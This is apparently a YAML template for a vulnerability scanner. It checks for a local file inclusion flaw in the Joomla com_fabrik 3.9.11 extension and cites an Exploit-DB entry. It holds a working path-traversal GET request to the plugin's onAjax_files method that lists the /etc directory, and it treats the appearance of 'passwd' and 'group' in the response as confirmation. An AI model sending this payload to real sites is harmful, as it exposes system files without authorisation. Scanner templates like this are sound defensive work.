product: Joomla
vName: Joomla fabrik 3.9.11 - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: Joomla! com_fabrik 3.9.11 is vulnerable to local file inclusion.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/48263
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/
    verify:
      logic: and
      check:
        - body:
            value:
              - '"value":"passwd"'
              - '"value":"group"'
              - '"disable":false'
            logic: and
        - status: 200
